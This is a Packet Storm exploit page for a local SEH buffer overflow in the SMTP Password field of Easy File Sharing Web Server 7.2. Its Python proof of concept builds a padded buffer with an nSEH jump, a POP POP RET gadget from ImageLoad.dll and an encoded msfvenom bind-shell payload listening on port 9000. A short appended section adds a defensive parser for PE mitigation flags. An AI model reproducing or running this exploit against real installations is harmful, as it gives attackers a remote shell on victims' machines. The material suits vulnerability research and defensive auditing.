Easy File Sharing Web Server 7.2 Local Buffer Overflow ≈ Packet Storm


# Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow (SEH)
# Date: 03/16/2020
# Author: Felipe Winsnes
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7

# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
# 2.- Copy the content of the new file "poc.txt" to clipboard
# 3.- Open fsws.exe
# 4.- Go to 'Options'
# 5.- Click upon 'SMTP Setup'
# 6.- Paste clipboard on bottom-right 'Password' parameter
# 7.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Locally-Exploiting-SMTP-section-in-Easy-File-Sharing-Web-Server/

import struct

# msfvenom -p windows/shell_bind_tcp LPORT=9000 -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 718 bytes

buf = b""
buf += b"\x89\xe1\xdd\xc5\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x49\x78\x6e"
buf += b"\x62\x67\x70\x57\x70\x63\x30\x31\x70\x6f\x79\x78\x65"
buf += b"\x56\x51\x6b\x70\x72\x44\x6e\x6b\x70\x50\x70\x30\x6c"
buf += b"\x4b\x43\x62\x44\x4c\x4e\x6b\x46\x32\x54\x54\x4c\x4b"
buf += b"\x30\x72\x55\x78\x36\x6f\x68\x37\x30\x4a\x67\x56\x36"
buf += b"\x51\x6b\x4f\x4c\x6c\x65\x6c\x50\x61\x63\x4c\x54\x42"
buf += b"\x74\x6c\x67\x50\x59\x51\x5a\x6f\x36\x6d\x56\x61\x68"
buf += b"\x47\x4a\x42\x6a\x52\x70\x52\x63\x67\x6e\x6b\x73\x62"
buf += b"\x46\x70\x4e\x6b\x63\x7a\x77\x4c\x6c\x4b\x72\x6c\x36"
buf += b"\x71\x30\x78\x48\x63\x53\x78\x37\x71\x5a\x71\x43\x61"
buf += b"\x4c\x4b\x72\x79\x37\x50\x66\x61\x4a\x73\x4c\x4b\x52"
buf += b"\x69\x45\x48\x58\x63\x54\x7a\x30\x49\x6c\x4b\x64\x74"
buf += b"\x6e\x6b\x77\x71\x78\x56\x36\x51\x49\x6f\x6c\x6c\x6f"
buf += b"\x31\x68\x4f\x36\x6d\x73\x31\x78\x47\x45\x68\x69\x70"
buf += b"\x42\x55\x6c\x36\x35\x53\x51\x6d\x5a\x58\x75\x6b\x63"
buf += b"\x4d\x36\x44\x31\x65\x58\x64\x63\x68\x4e\x6b\x32\x78"
buf += b"\x47\x54\x46\x61\x4e\x33\x70\x66\x4e\x6b\x66\x6c\x30"
buf += b"\x4b\x6e\x6b\x51\x48\x47\x6c\x75\x51\x6e\x33\x6e\x6b"
buf += b"\x56\x64\x4c\x4b\x47\x71\x4e\x30\x6e\x69\x63\x74\x57"
buf += b"\x54\x57\x54\x31\x4b\x53\x6b\x61\x71\x32\x79\x33\x6a"
buf += b"\x46\x31\x79\x6f\x4d\x30\x73\x6f\x31\x4f\x43\x6a\x6c"
buf += b"\x4b\x37\x62\x48\x6b\x6e\x6d\x71\x4d\x51\x78\x74\x73"
buf += b"\x76\x52\x43\x30\x37\x70\x73\x58\x54\x37\x64\x33\x30"
buf += b"\x32\x61\x4f\x70\x54\x33\x58\x30\x4c\x61\x67\x31\x36"
buf += b"\x66\x67\x69\x6f\x6e\x35\x78\x38\x4a\x30\x46\x61\x33"
buf += b"\x30\x77\x70\x74\x69\x6a\x64\x31\x44\x50\x50\x72\x48"
buf += b"\x66\x49\x6d\x50\x70\x6b\x75\x50\x4b\x4f\x6e\x35\x43"
buf += b"\x5a\x56\x68\x61\x49\x70\x50\x48\x62\x49\x6d\x61\x50"
buf += b"\x62\x70\x33\x70\x56\x30\x70\x68\x39\x7a\x44\x4f\x39"
buf += b"\x4f\x79\x70\x69\x6f\x4e\x35\x5a\x37\x43\x58\x64\x42"
buf += b"\x63\x30\x57\x53\x34\x68\x6c\x49\x5a\x46\x73\x5a\x46"
buf += b"\x70\x32\x76\x62\x77\x35\x38\x5a\x62\x49\x4b\x74\x77"
buf += b"\x50\x67\x4b\x4f\x48\x55\x66\x37\x31\x78\x4f\x47\x68"
buf += b"\x69\x67\x48\x39\x6f\x49\x6f\x69\x45\x53\x67\x62\x48"
buf += b"\x71\x64\x58\x6c\x65\x6b\x78\x61\x39\x6f\x6a\x75\x36"
buf += b"\x37\x6d\x47\x61\x78\x70\x75\x62\x4e\x70\x4d\x45\x31"
buf += b"\x69\x6f\x4e\x35\x71\x78\x43\x53\x70\x6d\x65\x34\x77"
buf += b"\x70\x6c\x49\x7a\x43\x62\x77\x66\x37\x70\x57\x34\x71"
buf += b"\x49\x66\x42\x4a\x44\x52\x53\x69\x50\x56\x58\x62\x4b"
buf += b"\x4d\x72\x46\x39\x57\x53\x74\x75\x74\x77\x4c\x65\x51"
buf += b"\x66\x61\x4e\x6d\x31\x54\x45\x74\x66\x70\x39\x56\x47"
buf += b"\x70\x70\x44\x71\x44\x42\x70\x32\x76\x72\x76\x56\x36"
buf += b"\x61\x56\x70\x56\x42\x6e\x32\x76\x73\x66\x32\x73\x73"
buf += b"\x66\x72\x48\x63\x49\x38\x4c\x47\x4f\x6d\x56\x59\x6f"
buf += b"\x39\x45\x4f\x79\x39\x70\x52\x6e\x71\x46\x51\x56\x49"
buf += b"\x6f\x50\x30\x45\x38\x57\x78\x6c\x47\x47\x6d\x51\x70"
buf += b"\x6b\x4f\x69\x45\x4f\x4b\x79\x70\x57\x6d\x66\x4a\x76"
buf += b"\x6a\x70\x68\x4d\x76\x7a\x35\x4f\x4d\x4f\x6d\x6b\x4f"
buf += b"\x6a\x75\x35\x6c\x64\x46\x33\x4c\x37\x7a\x6f\x70\x4b"
buf += b"\x4b\x59\x70\x50\x75\x43\x35\x4f\x4b\x63\x77\x67\x63"
buf += b"\x32\x52\x62\x4f\x33\x5a\x73\x30\x56\x33\x39\x6f\x7a"
buf += b"\x75\x41\x41"

seh = struct.pack("<I", 0x1002324C) # 0x1002324c : pop esi # pop edi # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
nseh = struct.pack("<I", 0x06710870)

# 512 bytes of padding reach the SEH record (nSEH, then the handler address);
# the encoded shellcode follows. Everything is kept as bytes so the script runs
# unchanged under Python 3, and the file is opened in binary mode for the same reason.
buffer = b"A" * 512 + nseh + seh + b"A" * 20 + buf + b"\xff" * 200
f = open("poc.txt", "wb")
f.write(buffer)
f.close()
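Added example, not part of the original PoC or of Felipe Winsnes's code: the mona-style comment on the `seh` line records why ImageLoad.dll was usable as a gadget source (ASLR: False, SafeSEH: False). The header parser below reads exactly those properties from a PE image so a defender can audit an installation for modules that still lack them; the sample image it inspects is constructed inline, and `pe_mitigations` and `build_pe32` are names chosen for this example.

```python
import struct
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF spec)
DYNAMIC_BASE = 0x0040      # ASLR opt-in (the "ASLR: False" column in the PoC comment)
NX_COMPAT = 0x0100         # DEP opt-in
NO_SEH = 0x0400            # image declares it installs no SEH handlers at all
LOAD_CONFIG_DIR = 10       # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, which holds the SafeSEH table

def pe_mitigations(data: bytes) -> dict:
    """Read the SEH-exploit-relevant mitigation flags from an in-memory PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    opt = e_lfanew + 4 + 20                       # skip signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    dirs = opt + (96 if magic == 0x10B else 112)             # first IMAGE_DATA_DIRECTORY
    n_dirs = struct.unpack_from("<I", data, dirs - 4)[0]     # NumberOfRvaAndSizes
    load_cfg_size = 0
    if n_dirs > LOAD_CONFIG_DIR:
        load_cfg_size = struct.unpack_from("<II", data, dirs + 8 * LOAD_CONFIG_DIR)[1]
    return {
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        "no_seh": bool(dllchars & NO_SEH),
        # An empty load-config directory rules SafeSEH out; a present one still needs
        # its SEHandlerTable/SEHandlerCount read to confirm the table is populated.
        "load_config_present": load_cfg_size != 0,
    }

def build_pe32(dllchars: int, load_cfg_size: int) -> bytes:
    """Constructed headers-only PE32 image used as sample input (not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew: PE header right after DOS header
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386 DLL, 224-byte opt header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR, 0x3000, load_cfg_size)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)

if __name__ == "__main__":
    # Same profile the PoC comment reports for ImageLoad.dll: no ASLR, no SafeSEH
    print(pe_mitigations(build_pe32(0, 0)))
    print(pe_mitigations(build_pe32(DYNAMIC_BASE | NX_COMPAT, 0x40)))
```

On a real installation, feed `pe_mitigations` the bytes of each DLL in the product directory; any module reporting `aslr: False` and `load_config_present: False` is a rebuild-with-/DYNAMICBASE-and-/SAFESEH candidate.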


